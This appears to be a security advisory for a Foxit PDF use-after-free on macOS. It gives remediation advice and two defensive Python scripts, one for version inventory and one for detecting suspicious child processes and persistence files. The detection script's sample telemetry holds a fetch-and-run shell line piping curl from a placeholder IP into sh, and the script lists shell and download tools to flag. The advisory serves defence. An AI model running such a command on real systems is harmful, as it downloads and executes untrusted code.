CVE-2025-55314

macOS · macOS Multiple Products

A high-severity vulnerability has been discovered in Foxit PDF Reader and Editor software running on macOS.

Executive summary

Foxit PDF Reader and Foxit PDF Editor for macOS contain a high-severity use-after-free vulnerability (CVSS 7.8). Exploitation requires a user to open a specially crafted PDF document; a successful exploit runs attacker-supplied code with that user's privileges. From there, theft of documents and credentials, installation of malware, and onward movement into the wider network are all possible.

Vulnerability

The flaw is a use-after-free in the PDF parsing engine of the affected Foxit products. A malicious PDF can carry objects arranged so that the parser frees a heap allocation and later dereferences a pointer that still refers to it. If the attacker can influence what the allocator places in the freed region before the stale pointer is used (for example through other objects in the same document), the dangling reference becomes controllable memory corruption and, from there, arbitrary code execution; if not, the usual outcome is a crash of the viewer. Any code that runs does so with the permissions of the logged-in user who opened the file, so gaining more than that user's access would require a second, separate vulnerability. The attack has no remote, unauthenticated path on its own: the victim must open the file.

Business impact

This vulnerability is rated High severity with a CVSS base score of 7.8. Successful exploitation gives the attacker the affected user's level of access on the workstation. Confidentiality is lost through theft of sensitive documents and of any credentials the user can read; integrity is lost because the attacker can alter or delete files; availability is at risk from persistent malware such as ransomware or spyware dropped by the exploit. A compromised endpoint can also serve as a beachhead for lateral movement across the corporate network, escalating the incident well beyond a single machine.

Remediation

Immediate Action: Apply the vendor security update. All instances of Foxit PDF Reader and Foxit PDF Editor on macOS must be updated to version 13.0 or later, the release in which the vendor addresses this vulnerability. After deployment, verify the installed version on each endpoint rather than relying on the update job's reported success, and review system and application logs from the period before the patch for signs that the flaw was exploited while the hosts were still vulnerable.
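To make the post-patch verification concrete, here is an added example (not Foxit's or Apple's code, and not part of the original advisory) that inventories application bundles on a macOS host, flags any Foxit build older than the 13.0 release named above, and records whether the installed binary carries the App Sandbox entitlement, which also serves the sandboxing item under Compensating Controls. The bundle-identifier prefix, the application directories, the process of reading entitlements through codesign, and the sample Info.plist are assumptions or constructed data; confirm the prefix against a known-good install before relying on the scan.

```python
"""Inventory Foxit PDF Reader / Editor bundles on a macOS host and flag any
build older than the patched release named in the advisory (13.0).

Added example, not Foxit's or Apple's code. The bundle-identifier prefix,
app directories and the sample plist below are assumptions / constructed.
"""
import os
import plistlib
import re
import shutil
import subprocess

# Minimum patched version as stated in the advisory.
MIN_PATCHED = (13, 0)

# Assumption: Foxit bundle identifiers start with this prefix. Confirm on a
# known install (defaults read "<app>/Contents/Info" CFBundleIdentifier).
FOXIT_BUNDLE_PREFIX = "com.foxit"

# Entitlement key that marks an App Sandbox-enabled binary.
SANDBOX_ENTITLEMENT = "com.apple.security.app-sandbox"


def parse_version(text):
    """'13.0.1' -> (13, 0, 1). Stops at the first non-numeric component."""
    parts = []
    for piece in str(text).strip().split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def is_patched(version, minimum=MIN_PATCHED):
    """True if version >= minimum, comparing numerically with zero padding."""
    ver = parse_version(version) if isinstance(version, str) else tuple(version)
    width = max(len(ver), len(minimum))

    def pad(t):
        return tuple(t) + (0,) * (width - len(t))

    return pad(ver) >= pad(minimum)


def audit_info_plist(plist_bytes):
    """Return a finding dict for a Foxit Info.plist, or None for other apps."""
    info = plistlib.loads(plist_bytes)
    bundle_id = info.get("CFBundleIdentifier", "")
    if not bundle_id.startswith(FOXIT_BUNDLE_PREFIX):
        return None
    version = info.get("CFBundleShortVersionString", "0")
    return {"bundle_id": bundle_id, "version": version,
            "patched": is_patched(version)}


def sandbox_entitled(app_path):
    """True/False if codesign reports the App Sandbox entitlement; None when
    codesign is unavailable (non-macOS host) or the check fails."""
    if shutil.which("codesign") is None:
        return None
    try:
        out = subprocess.run(["codesign", "-d", "--entitlements", "-", app_path],
                             capture_output=True, text=True, timeout=30)
    except (OSError, subprocess.SubprocessError):
        return None
    # Older codesign writes a raw blob, newer writes text; a substring search
    # works for both. Diagnostics go to stderr, so search both streams.
    return SANDBOX_ENTITLEMENT in (out.stdout + out.stderr)


def scan_applications(app_dirs=("/Applications", os.path.expanduser("~/Applications"))):
    """Audit every .app bundle in the given directories; missing dirs are skipped."""
    findings = []
    for directory in app_dirs:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            app_path = os.path.join(directory, name)
            plist_path = os.path.join(app_path, "Contents", "Info.plist")
            if not name.endswith(".app") or not os.path.isfile(plist_path):
                continue
            try:
                with open(plist_path, "rb") as fh:
                    finding = audit_info_plist(fh.read())
            except Exception:  # unreadable or malformed plist: skip, keep scanning
                continue
            if finding:
                finding["path"] = app_path
                finding["sandboxed"] = sandbox_entitled(app_path)
                findings.append(finding)
    return findings


# Constructed sample Info.plist (not a real Foxit file) so the audit can be
# exercised offline; the identifier and version are invented.
SAMPLE_OLD_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleIdentifier</key><string>com.foxit.example.reader</string>
  <key>CFBundleShortVersionString</key><string>12.1.3</string>
</dict></plist>"""

if __name__ == "__main__":
    print("sample:", audit_info_plist(SAMPLE_OLD_PLIST))
    for f in scan_applications():
        status = "OK" if f["patched"] else "VULNERABLE"
        print(f"{status}: {f['path']} {f['version']} sandboxed={f['sandboxed']}")
```

Run it from an MDM script or over SSH on each Mac and collect the output centrally; a `VULNERABLE` line after the update campaign means the job did not actually replace that bundle. A `sandboxed=False` result means an exploit would run with the user's full filesystem and network access, so the compensating controls below matter more on that host.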

Proactive Monitoring: Strengthen telemetry on endpoints running Foxit software. A PDF viewer has little reason to launch a shell, a scripting interpreter or a download utility, so child processes of the Foxit application process (e.g., FoxitPDFReader.app) such as sh, zsh, osascript, curl or python should raise an alert, once any helper processes the product legitimately spawns have been allowlisted from baseline data. Correlate unusual outbound connections from workstations to unknown hosts with a PDF having just been opened. Configure Endpoint Detection and Response (EDR) tooling to alert on file creation in persistence locations (LaunchAgents, LaunchDaemons) and on script execution originating from the Foxit process.
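The two detections described above, a Foxit process spawning a shell or interpreter and a Foxit process writing into a launch-item directory, as an added example run over constructed process telemetry. This is illustrative code written for this page, not the output of any EDR product; the JSON-lines schema, the Foxit process names, the helper allowlist and the sample events are all assumptions or constructed data and need to be mapped onto the field names your own tooling exports.

```python
"""Detection logic for the monitoring guidance above: flag a Foxit process
spawning a shell / interpreter / download tool, and Foxit writing into
macOS persistence locations. Runs over constructed sample telemetry.

Added example; the JSON-lines schema, process names and sample events are
assumptions / constructed data, not any EDR's real export format.
"""
import json

# Assumption: process names for Foxit's main executables as seen by the EDR.
FOXIT_PROCESSES = {"FoxitPDFReader", "Foxit PDF Reader", "Foxit PDF Editor"}

# Child processes a PDF viewer has no business launching.
SUSPICIOUS_CHILDREN = {"sh", "bash", "zsh", "osascript", "curl", "python3",
                       "perl", "launchctl", "open"}

# Assumption: helpers the product legitimately spawns; tune from baseline data.
ALLOWED_CHILDREN = {"FoxitPDFReader Helper"}

# Paths where a dropped file means persistence rather than a saved document.
PERSISTENCE_MARKERS = ("/Library/LaunchAgents/", "/Library/LaunchDaemons/")


def is_foxit(name):
    return name in FOXIT_PROCESSES


def evaluate(event):
    """Return a list of reasons this event is suspicious (empty if benign)."""
    reasons = []
    kind = event.get("type")
    if kind == "exec" and is_foxit(event.get("parent", "")):
        child = event.get("process", "")
        if child in SUSPICIOUS_CHILDREN:
            reasons.append(f"foxit spawned {child}: {event.get('cmdline', '')}")
        elif child not in ALLOWED_CHILDREN:
            reasons.append(f"foxit spawned unexpected child {child}")
    if kind == "file_create" and is_foxit(event.get("process", "")):
        path = event.get("path", "")
        if any(marker in path for marker in PERSISTENCE_MARKERS):
            reasons.append(f"foxit wrote persistence item {path}")
    return reasons


def detect(lines):
    """Parse JSON-lines telemetry and return (host, ts, reason) alerts."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry line: skip rather than crash the pipeline
        for reason in evaluate(event):
            alerts.append((event.get("host"), event.get("ts"), reason))
    return alerts


# Constructed sample telemetry (hosts, timestamps, paths and the 203.0.113.7
# documentation address are invented). Lines 2 and 3 should alert, the rest not.
SAMPLE_TELEMETRY = """
{"ts":"2025-09-01T09:14:02Z","host":"mac-042","type":"exec","parent":"launchd","process":"Foxit PDF Reader","cmdline":"/Applications/Foxit PDF Reader.app/Contents/MacOS/FoxitPDFReader"}
{"ts":"2025-09-01T09:14:20Z","host":"mac-042","type":"exec","parent":"Foxit PDF Reader","process":"zsh","cmdline":"zsh -c 'curl -s http://203.0.113.7/s | sh'"}
{"ts":"2025-09-01T09:14:21Z","host":"mac-042","type":"file_create","process":"Foxit PDF Reader","path":"/Users/alice/Library/LaunchAgents/com.update.helper.plist"}
{"ts":"2025-09-01T09:15:00Z","host":"mac-017","type":"file_create","process":"Foxit PDF Reader","path":"/Users/bob/Documents/quarterly.pdf"}
{"ts":"2025-09-01T09:15:30Z","host":"mac-017","type":"exec","parent":"Terminal","process":"zsh","cmdline":"zsh -l"}
not json at all
""".strip().splitlines()

if __name__ == "__main__":
    for host, ts, reason in detect(SAMPLE_TELEMETRY):
        print(f"ALERT {host} {ts}: {reason}")
```

The shell-child rule is the high-confidence signal; the "unexpected child" branch exists so that a renamed or unusual binary does not slip past a fixed blocklist, but it will be noisy until the allowlist reflects what Foxit actually spawns in your environment, so ship it at a lower severity first.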

Compensating Controls: If immediate patching is not feasible, the following controls can help mitigate risk:

  • User Education: Advise all users not to open PDF files from untrusted or unsolicited sources, such as unexpected email attachments, and to report them instead. Because the exploit cannot fire until the file is opened, this control removes the trigger rather than merely reducing impact.
  • Application Sandboxing: The macOS App Sandbox is a build-time entitlement (com.apple.security.app-sandbox) that the developer opts into; it is not a setting an administrator can switch on for a third-party application. Check whether the installed Foxit build actually carries that entitlement by dumping its entitlements with codesign. If it does, a sandbox escape would be needed to reach the rest of the system; if it does not, assume an exploit has the user's full file and network access and lean on the other controls.
  • Alternative Viewers: Route documents from untrusted sources through a fully patched alternative viewer, such as Apple's built-in Preview, until the Foxit update is complete.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the high severity (CVSS 7.8) and the potential for arbitrary code execution, this vulnerability poses a significant risk to the organization. It is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog and no public exploit is known, but malicious PDFs are a well-established phishing vector and the impact warrants immediate action. The primary recommendation is to apply the vendor-supplied security update to all affected macOS systems without delay and to verify the installed version afterwards. Where patching cannot be deployed immediately, the compensating controls and proactive monitoring outlined above must be implemented as a matter of priority.